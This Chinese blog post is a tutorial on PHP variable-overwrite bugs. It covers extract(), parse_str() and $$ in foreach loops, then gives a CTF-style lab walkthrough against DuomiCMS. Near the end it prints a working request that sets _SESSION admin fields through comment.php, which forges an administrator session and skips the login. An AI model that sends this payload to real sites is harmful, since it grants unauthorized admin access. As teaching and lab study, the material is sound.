变量覆盖漏洞详解

poggioxay

已于 2024-04-29 12:26:14 修改

阅读量1.2k

点赞数 2

分类专栏：常见web漏洞文章标签：代码审计变量覆盖 web安全

于 2022-03-10 18:45:08 首次发布

本文链接：https://blog.csdn.net/m0_55854679/article/details/123396357

版权

常见web漏洞专栏收录该内容

26 篇文章 9 订阅

订阅专栏

什么是变量覆盖

变量覆盖指的是可以用我们的传参值替换程序原有的变量值，自身危害由代码本身来决定。

如何寻找变量覆盖

经常导致变量覆盖漏洞场景有：$$使用不当，extract()函数使用不当，parse_str()函数使用不当，import_request_variables()使用不当，开启了全局变量注册等。

函数解析

传参当做变量，开发起来更加的方便快捷，二次开发会有很大的帮助。

extract()函数

作用： 把数组变成变量。

<?php
$a = "1";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
 
运行结果：$a = Cat; $b = Dog; $c = Horse

典型CTF：
在这里插入图片描述

parse_str() 函数

作用： 把字符串变成变量

<?php
	parse_str("name=gyy&&age=60");   // test=123&gift=123
	echo $name."<br>";
	echo $age;
	?>

输出了gyy和60

$$特殊符号

不仅仅是函数会导致变量覆盖，有些特殊符号的特殊搭配也会引起变量覆盖漏洞，比如$$。
$$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现，如以下的示例代码，使用foreach来遍历数组中的值，然后再将获取到的数组键名作为变量，数组中的值作为变量的值，因此就产生了变量覆盖漏洞。请求?name=test 会将$name的值覆盖，变为test。

【实现传参作为变量】：

<?php
$a = 1;
foreach(array('_COOKIE','_POST','_GET') as $_request) {       // $_request只是一个普通的变量名
foreach($$_request as $_key=>$_value) 
{$$_key=addslashes($_value);}}
echo $a;
?>

这个代码会接受我们的GET提交、POST提交、COOKIE参数，将这个接受来的参数依次放入$_request，$$_request是两次变量赋值操作，$_key=>$_value 这是个数组解析，实际上就是键值分离。key指传参名，value指传参值。正常而言$a = 1是一个定值，但是因为$$_key的缘故,当我传参a=2；那么$$_key=addslashes($_value)【addslashes函数在这里可以理解为把传参作为变量】；就变为了$a = 2 。

练习

在这里插入图片描述

本次练习用到Duomicms，我们首先使用代码审计工具在源码中搜索危险函数extract()，发现没有任何用处。
parse_str()函数源码中没有出现。
继续尝试特殊符号$$
因为我们没有后台权限，所以在代码审计过程中，admin目录下的文件可以忽略不看，一般common. 、.func.【定义函数，函数库】、.class. 、.inc. 这些文件都比较有用。
我们找到一个可用的函数点。

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

我们在本次搭建好CMS后，抓取后台登录的数据包
我们找到后台登录相关的源码login.php，这个页面似乎还调用了check.admin.php，或者发现了keepuser()这个函数，选中函数，右键定位函数也可找到check.admin.php文件。通过看check.admin.php这个文件的备注，就能知道这个文件是控制session的，可以控制权限、id、用户名，那么我们是不是可以通过common.php进行一个伪造session呢？

在这里插入图片描述

8. 为了得到session，修改login.php，使其登录成功后输出session。

die(var_dump($_SESSION));

在这里插入图片描述

array(5) { ["duomi_ckstr"]=> string(4) "rmcf" ["duomi_ckstr_last"]=> 
string(0) "" ["duomi_admin_id"]=> string(1) "1" ["duomi_group_id"]=> 
string(1) "1" ["duomi_admin_name"]=> string(5) "admin" }

接下来的核心是设置SESSION，SESSION修改前需要先开启，即session_start()函数。找到含有这个函数的文件对它进行传参。

http://blfg95a.zs.aqlab.cn/duomicms/upload/interface/comment.php?
_SESSION[duomi_ckstr]=rmcf&_SESSION[duomi_ckstr_last]=
&_SESSION[duomi_admin_id]=1&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=admin

先进行强行修改SESSION，我们再访问后台http://blfg95a.zs.aqlab.cn/admin/，不需要输入账号密码，直接管理员登录成功。

在这里插入图片描述
11. 进入后台，在公众号页面即可得到flag。

poggioxay

关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
3
评论
变量覆盖漏洞详解

什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值，自身危害由代码本身来决定。如何寻找变量覆盖经常导致变量覆盖漏洞场景有：$$使用不当，extract()函数使用不当，parse_str()函数使用不当，import_request_variables()使用不当，开启了全局变量注册等。函数解析传参当做变量，开发起来更加的方便快捷，二次开发会有很大的帮助。extract()函数作用：把数组变成变量。<?php$a = "1";$my_array = array("
复制链接

扫一扫